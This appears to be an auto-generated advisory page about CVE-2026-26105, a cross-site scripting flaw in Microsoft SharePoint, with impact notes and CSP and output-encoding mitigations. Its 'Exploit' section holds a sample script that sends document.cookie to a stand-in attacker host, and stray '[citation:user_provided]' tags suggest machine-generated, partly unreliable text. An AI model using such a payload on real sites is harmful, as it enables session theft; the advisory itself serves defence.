Microsoft Office SharePoint, Cross-site Scripting (XSS), CVE-2026-26105 (HIGH)

Listen to this Post

CVE-2026-26105 is a cross-site scripting (XSS) vulnerability found in Microsoft Office SharePoint. It stems from the improper neutralization of user input during web page generation. The attack vector is over the network, requires user interaction, and can be executed by an unauthorized (unauthenticated) attacker [citation:user_provided]. The root cause is insufficient sanitization of crafted web requests sent to the SharePoint server . When a victim user interacts with a malicious link or visits a page containing the injected payload, the attacker’s script executes in the context of the victim’s browser . This allows the attacker to perform spoofing attacks, such as stealing session tokens or manipulating page content to deceive the user . The vulnerability has a high impact on both the confidentiality and integrity of the system, but does not affect availability [citation:user_provided].
Platform: Microsoft Office SharePoint [citation:user_provided]
Version: Not specified [citation:user_provided]
Vulnerability : Cross-site Scripting [citation:user_provided]
Severity: HIGH (8.1) [citation:user_provided]
date: March 10, 2026 [citation:user_provided]

Prediction: April 14, 2026

What Undercode Say:

Analytics

Recent SharePoint XSS flaws show consistent attacker interest in spoofing and session theft .
The CVSS score of 8.1 indicates a critical need for prioritization in patch management.

Exploit:

Attackers inject malicious JavaScript via crafted input to a SharePoint field or parameter.
Payloads often target the document.location or cookie objects to hijack sessions.

// Example XSS Payload to steal session cookies

<script>
fetch('https://attacker-controlled.com/steal?cookie=' + document.cookie);
</script>

Protection from this CVE

Apply the official Microsoft security update immediately upon release .
Implement a strong Content Security Policy (CSP) header to restrict script sources .

Example IIS configuration for CSP header in SharePoint web.config
Add the following line within the <system.webServer>/<httpProtocol>/<customHeaders> section:
<add name="Content-Security-Policy" value="default-src 'self'; script-src 'self';" />

Ensure proper output encoding is used by the application, specifically utilizing `SPHttpUtility.HtmlEncode` for any user-generated content rendered on pages .

Impact

Spoofing: Attackers can impersonate legitimate users or the SharePoint site itself.
Data Theft: Confidential information displayed on the page can be exfiltrated.
Account Takeover: Session tokens stolen via XSS can lead to full account compromise.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top